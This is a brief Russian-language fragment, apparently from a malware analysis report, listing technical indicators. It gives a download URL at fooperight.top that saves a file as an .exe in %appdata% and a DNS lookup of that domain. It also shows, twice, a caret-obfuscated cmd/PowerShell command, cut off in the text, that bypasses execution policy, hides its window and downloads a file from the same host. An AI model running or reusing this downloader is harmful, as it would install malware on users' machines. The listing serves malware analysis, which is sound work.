Техническая информация
- http://fooperight.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWeR^s^h^e^l^l^.exE^ -eXecUTIO^npOL^Icy^ B^ypA^S^s -^nO^prO^f^I^Le ^-^wIndOWst^y^l^E^ ^hiDDen ^(^nEW-^oBJeCt s^y^ST^E^M^.N^E^t.Web^cLI^e^nT^)^.^d^O^WnlOADF^I^le(^'http://foope...
- DNS ASK fo###right.top
- '<SYSTEM32>\cmd.exe' /c "poWeR^s^h^e^l^l^.exE^ -eXecUTIO^npOL^Icy^ B^ypA^S^s -^nO^prO^f^I^Le ^-^wIndOWst^y^l^E^ ^hiDDen ^(^nEW-^oBJeCt s^y^ST^E^M^.N^E^t.Web^cLI^e^nT^)^.^d^O^WnlOADF^I^le(^'http://foope...' (со скрытым окном)